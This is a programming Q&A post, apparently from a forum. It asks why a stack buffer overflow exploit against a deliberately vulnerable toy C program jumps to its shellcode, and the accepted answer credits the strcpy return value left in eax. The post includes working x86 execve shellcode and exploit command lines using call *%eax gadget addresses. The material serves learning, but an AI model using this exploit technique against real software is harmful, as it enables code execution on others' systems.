# How to explain this buffer overflow vulnerability in C

Tags: c, debugging, assembly, buffer-overflow

Given this C program:

```
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  char buf[1024];
  strcpy(buf, argv[1]);
}
```

Built with:

```
gcc -m32 -z execstack prog.c -o prog
```

Given shell code:

```
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
```

The program is exploitable with the commands:

```
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
```

where I got the addresses from:

```
$ objdump -d prog | grep call.*eax
 8048387:   ff d0                   call   *%eax
 804840f:   ff d0                   call   *%eax
```

I understand the meaning of the `AAAA` paddings in the middle, I calculated the 991 based on the length of `buf` in the program and the length of `$EGG`.

What I don't understand is why any of these addresses with `call *%eax` trigger the execution of the shellcode copied to the beginning of `buf`. As far as I understand, I'm overwriting the return address with `0x8048387` (or the other one), what I don't understand is why this leads to jumping to the shellcode.

I got this far by reading [Smashing the stack for fun and profit](http://insecure.org/stf/smashstack.html). But the article uses a different approach of guessing a relative address to jump to the shellcode. I'm puzzled by why this more simple, alternative solution works, straight without guesswork.

Answer (score 2, accepted):

The return value of `strcpy` is the destination (`buf` in this case) and that's passed using register `eax`. Thus if nothing destroys `eax` until `main` returns, `eax` will hold a pointer to your shell code.